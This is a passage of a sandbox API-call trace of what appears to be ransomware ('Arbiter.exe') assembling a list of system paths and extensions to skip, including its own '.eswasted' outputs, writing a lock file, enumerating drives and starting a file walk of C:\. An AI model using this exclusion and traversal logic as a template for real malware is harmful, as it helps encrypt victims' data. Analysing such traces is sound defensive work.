pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] StrChrW (lpStart="sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.746] lstrlenW (lpString="sys") returned 3 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f586c*=0x73, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] StrChrW (lpStart="vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.747] lstrlenW (lpString="vmlinuz") returned 7 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5874*=0x76, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] StrChrW (lpStart="run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.747] lstrlenW (lpString="run") returned 3 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5884*=0x72, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] StrChrW (lpStart="var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.747] lstrlenW (lpString="var") returned 3 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f588c*=0x76, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] StrChrW (lpStart="\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.747] lstrlenW (lpString="\\Boot") returned 5 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5894*=0x5c, cb=0xa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.747] StrChrW (lpStart="System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.747] lstrlenW (lpString="System Volume Information") returned 25 [0069.747] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f58a0*=0x53, cb=0x32, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] StrChrW (lpStart="$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.748] lstrlenW (lpString="$RECYCLE.BIN") returned 12 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f58d4*=0x24, cb=0x18, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] StrChrW (lpStart="WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.748] lstrlenW (lpString="WebCache") returned 8 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f58ee*=0x57, cb=0x10, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] StrChrW (lpStart="Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.748] lstrlenW (lpString="Caches") returned 6 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5900*=0x43, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] StrChrW (lpStart="WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|AppData|ProgramData|\\Users\\All Users" [0069.748] lstrlenW (lpString="WindowsApps") returned 11 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f590e*=0x57, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.748] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] StrChrW (lpStart="AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|ProgramData|\\Users\\All Users" [0069.749] lstrlenW (lpString="AppData") returned 7 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5926*=0x41, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] StrChrW (lpStart="ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Users\\All Users" [0069.749] lstrlenW (lpString="ProgramData") returned 11 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5936*=0x50, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] StrChrW (lpStart="\\Users\\All Users", wMatch=0x7c) returned 0x0 [0069.749] lstrlenW (lpString="\\Users\\All Users") returned 16 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f594e*=0x5c, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.749] IStream:Stat (in: This=0x6ee010, pstatstg=0x114fe38, grfStatFlag=0x1 | out: pstatstg=0x114fe38) returned 0x0 [0069.749] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x604) returned 0x6f5f90 [0069.749] IStream:RemoteSeek (in: This=0x6ee010, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0069.749] ISequentialStream:RemoteRead (in: This=0x6ee010, pv=0x6f5f90, cb=0x602, pcbRead=0x0 | out: pv=0x6f5f90*=0x2a, pcbRead=0x0) returned 0x0 [0069.749] IUnknown:Release (This=0x6ee010) returned 0x0 [0069.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5820 | out: hHeap=0x6d0000) returned 1 [0069.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5588 | out: hHeap=0x6d0000) returned 1 [0069.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5130 | out: hHeap=0x6d0000) returned 1 [0069.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4f88 | out: hHeap=0x6d0000) returned 1 [0069.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f50b0 | out: hHeap=0x6d0000) returned 1 [0069.750] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0069.750] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x114ff74 | out: pNumArgs=0x114ff74) returned 0x6f4f88*="C:\\Windows\\SysWOW64\\Arbiter.exe" [0069.750] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21) returned 0x6f4fd8 [0069.750] CryptAcquireContextW (in: phProv=0x114fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fea8*=0x6f5130) returned 1 [0069.997] CryptGenRandom (in: hProv=0x6f5130, dwLen=0x21, pbBuffer=0x6f4fd8 | out: pbBuffer=0x6f4fd8) returned 1 [0069.997] CryptReleaseContext (hProv=0x6f5130, dwFlags=0x0) returned 1 [0069.997] CreateFileW (lpFileName="C:\\Windows\\TEMP\\lck.log" (normalized: "c:\\windows\\temp\\lck.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.998] WriteFile (in: hFile=0xf8, lpBuffer=0x6f4fd8*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x114fec4, lpOverlapped=0x0 | out: lpBuffer=0x6f4fd8*, lpNumberOfBytesWritten=0x114fec4*=0x21, lpOverlapped=0x0) returned 1 [0069.999] SetEndOfFile (hFile=0xf8) returned 1 [0069.999] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4fd8 | out: hHeap=0x6d0000) returned 1 [0069.999] _wcslwr (in: _String=0x6f50e8 | out: _String="*") returned="*" [0069.999] _wcslwr (in: _String=0x6f5f90 | out: _String="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0069.999] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0070.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6f52e0 [0070.000] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x6f52f6 | out: lpBuffer="C:\\") returned 0x4 [0070.000] lstrlenW (lpString="C:\\") returned 3 [0070.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.000] lstrlenW (lpString="C:\\") returned 3 [0070.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.000] QueryDosDeviceW (in: lpDeviceName="C:", lpTargetPath=0x114fe8c, ucchMax=0x18 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x0 [0070.000] lstrlenW (lpString="C:\\") returned 3 [0070.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.000] lstrlenW (lpString="C:\\") returned 3 [0070.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0070.000] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x44) returned 0x6f5130 [0070.000] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xfc [0070.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405baf, lpParameter=0x6f5130, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0070.002] StrChrW (lpStart="C:\\", wMatch=0x7c) returned 0x0 [0070.002] lstrlenW (lpString="C:\\") returned 3 [0070.002] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xfffe) returned 0x6f65a0 [0070.003] lstrlenW (lpString="*") returned 1 [0070.003] lstrlenW (lpString="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned 769 [0070.003] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x608) returned 0x7065a8 [0070.003] lstrcpyW (in: lpString1=0x7065ac, lpString2="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" | out: lpString1="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0070.003] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x6f5cc0 [0070.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, 